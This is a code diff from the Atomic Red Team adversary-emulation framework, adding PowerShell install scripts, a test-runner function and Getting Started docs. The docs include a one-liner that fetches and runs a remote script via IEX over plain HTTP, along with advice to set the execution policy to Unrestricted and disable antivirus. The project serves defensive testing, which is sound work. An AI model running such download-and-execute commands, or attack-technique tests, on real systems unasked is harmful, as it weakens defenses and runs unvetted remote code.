This spec describes the format of Atomic Red Team atomic tests that are defined in YAML format.
The Atomic YAML schema is specified in the [Atomic Red Team YAML Spec](atomic_red_team/spec.yaml). See that
The Atomic YAML schema is specified in the [Atomic Red Team YAML Spec]({{
site.github.repository_url }}/blob/master/atomic_red_team/spec.yaml). See that
file for complete details about what each field means and a list of possible values.
The source of truth for a test is the YAML file - the associated human readable Markdown file is automatically
docs/invoke-atomic-red-team.md
+126
View File
@@ -0,0 +1,126 @@
---
layout: default
---
# Getting Started - PowerShell Invoke-AtomicRedTeam
1. [Install Atomic Red Team](#install-atomic-red-team)
2. [Generate Tests](#generate-tests)
3. [Execute Tests](#execute-tests)
4. [Other Examples](#Other-Examples)
## Install Atomic Red Team
* Be sure to get permission and necessary approval before conducting test's. Unauthorized testing is a bad decision
and can potentially be a resume-generating event.
* Set up a test machine that would be similar to the build in your environment. Be sure you have your collection/EDR
solution in place, and that the endpoint is checking in and active. It is best to have AV turned off.
We made installing Atomic Red Team extremely easy.
Once the environment is ready, run the following PowerShell one liner as Administrator:
`powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://psinstall.AtomicRedTeam.com')"`
[Source](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/execution-frameworks/Invoke-AtomicRedTeam/install-AtomicRedTeam.ps1)
By default, it will download and install Atomic Red Team to `c:\tools\`
Running the [install script](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/execution-frameworks/Invoke-AtomicRedTeam/install-AtomicRedTeam.ps1) locally provides three parameters:
InstallPath
- Where ART is to be installed
`install-AtomicRedTeam.ps1 -InstallPath c:\tools\`
DownloadPath
- Where ART is to be downloaded
`install-AtomicRedTeam.ps1 -DownloadPath c:\tools\`
Verbose
- Verbose output during installation
`install-AtomicRedTeam.ps1 -verbose`
### Manual Installation
To manually install Invoke-AtomicRedTeam:
`set-executionpolicy Unrestricted`
[PowerShell-Yaml](https://github.com/cloudbase/powershell-yaml) is required to parse Atomic yaml files:
`Install-Module -Name powershell-yaml`
`Import-Module .\Invoke-AtomicRedTeam.psm1`
## Generate Tests
This process generates all Atomic tests and allows for easy copy and paste execution.
Note: you may need to change the path.
Invoke-AllAtomicTests -GenerateOnly
### Execute All Tests
Execute all Atomic tests:
Invoke-AllAtomicTests
### Execute All Tests - Specific Directory
Specify a path to atomics folder, example C:\AtomicRedTeam\atomics
Invoke-AllAtomicTests -path C:\AtomicRedTeam\atomics
### Execute a Single test
$T1117 = Get-AtomicTechnique -Path ..\..\atomics\T1117\T1117.yaml
Invoke-AtomicTest $T1117
## Other Examples
If you would like output when running tests using the following:
#### Informational Stream
```powershell
Invoke-AtomicTest $T1117 -InformationAction Continue
```
#### Verbose Stream
```powershell
Invoke-AtomicTest $T1117 -Verbose
```
#### Debug Stream
```powershell
Invoke-AtomicTest $T1117 -Debug
```
#### WhatIf
If you would like to see what would happen without running the test
```powershell
Invoke-AtomicTest $T1117 -WhatIf
```
#### Confirm
To run all tests without confirming them run using the Confirm switch to false
```powershell
Invoke-AtomicTest $T1117 -Confirm:$false
```
Or you can set your `$ConfirmPreference` to 'Medium'
```powershell
$ConfirmPreference = 'Medium'
Invoke-AtomicTest $T1117
```
execution-frameworks/Invoke-AtomicRedTeam/Invoke-AtomicRedTeam/Public/Invoke-AllAtomicTests.ps1
+78
View File
@@ -0,0 +1,78 @@
<#
.SYNOPSIS
Invokes all Atomic test(s)
.DESCRIPTION
Invokes all Atomic tests(s). Optionally, you can specify if you want to generate all Atomic test(s) only.
.EXAMPLE Invokes Atomic Test
PS/> Invoke-AllAtomicTests
PS/> Invoke-AllAtomicTests -Force
.EXAMPLE Generate All Atomic Tests
PS/> Invoke-AllAtomicTests -GenerateOnly
.PARAMETER Path
Path to atomics folder, example C:\AtomicRedTeam\atomics
.PARAMETER GenerateOnly
Generate tests only do not execute. Writes test commands to STDOUT
.PARAMETER Force
Override safety handler. Normally this will prompt you to confirm all tests. This will override that.
.NOTES
Create Atomic Tests from yaml files described in Atomic Red Team. https://github.com/redcanaryco/atomic-red-team
.LINK
Github repo: https://github.com/redcanaryco/atomic-red-team
#>
function Invoke-AllAtomicTests {
[CmdletBinding(DefaultParameterSetName = 'technique',
SupportsShouldProcess = $true,
PositionalBinding = $false,
ConfirmImpact = 'Medium')]
Param(
[Parameter(Mandatory = $true,
Position = 0,
ValueFromPipelineByPropertyName = $true,
ParameterSetName = 'technique')]
[ValidateNotNullOrEmpty()]
[System.String]
$Path,
[Parameter(Mandatory = $false,
Position = 1,
ValueFromPipelineByPropertyName = $true,
ParameterSetName = 'technique')]
[switch]
$GenerateOnly,
[switch]
$Force
)
$InformationPreference = 'Continue'
function Invoke-AllTests()
{
[System.Collections.HashTable]$AllAtomicTests = @{}
$AtomicFilePath = $Path
Get-ChildItem $AtomicFilePath -Recurse -Filter *.yaml -File | ForEach-Object {
$currentTechnique = [System.IO.Path]::GetFileNameWithoutExtension($_.FullName)
$parsedYaml = (ConvertFrom-Yaml (Get-Content $_.FullName -Raw ))
$AllAtomicTests.Add($currentTechnique, $parsedYaml);
}
if($GenerateOnly)
{
$AllAtomicTests.GetEnumerator() | Foreach-Object { Invoke-AtomicTest $_.Value -GenerateOnly }
}
else
{
$AllAtomicTests.GetEnumerator() | Foreach-Object { Invoke-AtomicTest $_.Value }
}
}
if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to execute all tests?',
"Highway to the danger zone, Executing All Atomic Tests!" ) )
{
Invoke-AllTests
}
}
execution-frameworks/Invoke-AtomicRedTeam/README.md
+58 -27
View File
@@ -1,23 +1,69 @@
# Invoke-AtomicRedTeam
## Requires Installation of PowerShell-Yaml As Administrator
## Setup
```powershell
Install-Module -Name powershell-yaml
```
### Install Atomic Red Team
For Additional Details:
[PowerShell-Yaml](https://github.com/cloudbase/powershell-yaml)
Get started with our simple Install script:
## Basic usage Examples
`powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://psInstall.AtomicRedTeam.com')"`
#### Load PowerShell Script
[Source](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/execution-frameworks/Invoke-AtomicRedTeam/Install-AtomicRedTeam.ps1)
```powershell
Import-Module C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\Invoke-AtomicRedTeam\Invoke-AtomicRedTeam.psm1
```
By default, it will download and Install Atomic Red Team to `c:\AtomicRedTeam`
#### Execute Single Test
Running the [Install script](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/execution-frameworks/Invoke-AtomicRedTeam/Install-AtomicRedTeam.ps1) locally provides three parameters:
InstallPath
- Where ART is to be Installed
`Install-AtomicRedTeam.ps1 -InstallPath c:\tools\`
DownloadPath
- Where ART is to be downloaded
`Install-AtomicRedTeam.ps1 -DownloadPath c:\tools\`
Verbose
- Verbose output during Installation
`Install-AtomicRedTeam.ps1 -verbose`
### Manual
`set-executionpolicy Unrestricted`
[PowerShell-Yaml](https://github.com/cloudbase/powershell-yaml) is required to parse Atomic yaml files:
`Install-Module -Name powershell-yaml`
`Import-Module .\Invoke-AtomicRedTeam.psm1`
## Getting Started
### Generate Tests
This process generates all Atomic tests and allows for easy copy and paste execution.
Note: you may need to change the path.
Invoke-AllAtomicTests -GenerateOnly
#### Execute All Tests
Execute all Atomic tests:
Invoke-AllAtomicTests
#### Execute All Tests - Specific Directory
Specify a path to atomics folder, example C:\AtomicRedTeam\atomics
Invoke-AllAtomicTests -path C:\AtomicRedTeam\atomics
#### Execute a Single Test
```powershell
$T1117 = Get-AtomicTechnique -Path ..\..\atomics\T1117\T1117.yaml
@@ -68,18 +114,3 @@ Or you can set your `$ConfirmPreference` to 'Medium'
$ConfirmPreference = 'Medium'
Invoke-AtomicTest $T1117
```
## Generate All Tests
```powershell
[System.Collections.HashTable]$AllAtomicTests = @{}
$AtomicFilePath = 'C:\AtomicRedTeam\atomics\'
Get-ChildItem $AtomicFilePath -Recurse -Filter *.yaml -File | ForEach-Object {
$currentTechnique = [System.IO.Path]::GetFileNameWithoutExtension($_.FullName)
$parsedYaml = (ConvertFrom-Yaml (Get-Content $_.FullName -Raw ))
$AllAtomicTests.Add($currentTechnique, $parsedYaml);
}
$AllAtomicTests.GetEnumerator() | Foreach-Object { Invoke-AtomicTest $_.Value -GenerateOnly }
```
### Feedback Welcome
execution-frameworks/Invoke-AtomicRedTeam/install-atomicredteam.ps1
+130
View File
@@ -0,0 +1,130 @@
#Requires -RunAsAdministrator
[CmdletBinding()]
Param(
[Parameter(Mandatory=$False,Position=0)]
[string]$InstallPath = 'C:\AtomicRedTeam',
[Parameter(Mandatory=$False,Position=0)]
[string]$DownloadPath = 'C:\AtomicRedTeam'
)
function Install-AtomicRedTeam {
<#
.SYNOPSIS
This is a simple script to download and install Atomic Red Team Invoke-AtomicRedTeam Powershell Framework.
Atomic Function: Install-AtomicRedTeam
Author: Red Canary Research
License: MIT License
Required Dependencies: powershell-yaml
Optional Dependencies: None
.PARAMETER DownloadPath
Specifies the desired path to download Atomic Red Team.
.PARAMETER InstallPath
Specifies the desired path for where to install Atomic Red Team.
.EXAMPLE
Install Atomic Red Team
PS> Install-AtomicRedTeam.ps1
.EXAMPLE
Execute a single test
$T1117 = Get-AtomicTechnique -Path ..\..\atomics\T1117\T1117.yaml
Invoke-AtomicTest $T1117
.EXAMPLE
Informational Stream
Invoke-AtomicTest $T1117 -InformationAction Continue
.EXAMPLE
Verbose Stream
Invoke-AtomicTest $T1117 -Verbose
.EXAMPLE
Debug Stream
Invoke-AtomicTest $T1117 -Debug
.EXAMPLE
What if
If you would like to see what would happen without running the test
Invoke-AtomicTest $T1117 -WhatIf
.EXAMPLE
To run all tests without confirming them run using the Confirm switch to false
Invoke-AtomicTest $T1117 -Confirm:$false
Or you can set your $ConfirmPreference to 'Medium'
$ConfirmPreference = 'Medium'
Invoke-AtomicTest $T1117
.EXAMPLE
Invoke-AllAtomicTests -GenerateOnly
.NOTES
Use the '-Verbose' option to print detailed information.
#>
write-verbose "Directory Creation"
if(!(Test-Path -Path $InstallPath )){
New-Item -ItemType directory -Path $InstallPath
write-verbose "Setting Execution Policy to Unrestricted"
set-executionpolicy Unrestricted
write-verbose "Setting variables for remote URL and download Path"
$url = "https://github.com/redcanaryco/atomic-red-team/archive/master.zip"
$path = "$DownloadPath\master.zip"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$webClient = new-object System.Net.WebClient
write-verbose "Beginning download from Github"
$webClient.DownloadFile( $url, $path )
write-verbose "Extracting ART to C:\AtomicRedTeam\"
expand-archive -LiteralPath "$DownloadPath\master.zip" -DestinationPath "$InstallPath"
write-verbose "Installing NuGet PackageProvider"
Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
write-verbose "Installing powershell-yaml"
Install-Module -Name powershell-yaml -Force
write-verbose "Importing invoke-atomicRedTeam module"
Import-Module "$InstallPath\atomic-red-team-master\execution-frameworks\Invoke-AtomicRedTeam\Invoke-AtomicRedTeam\Invoke-AtomicRedTeam.psm1"
write-verbose "Changing current work directory Invoke-AtomicRedTeam"
cd "$InstallPath\atomic-red-team-master\execution-frameworks\Invoke-AtomicRedTeam\Invoke-AtomicRedTeam\"
write-verbose "Clearing screen"
clear
Write-Host "Installation of Invoke-AtomicRedTeam is complete" -Fore Yellow
}
else
{
Write-Verbose "Atomic Already exists at $InstallPath"
exit
}
}
Install-AtomicRedTeam

Some files were not shown because too many files have changed in this diff Show More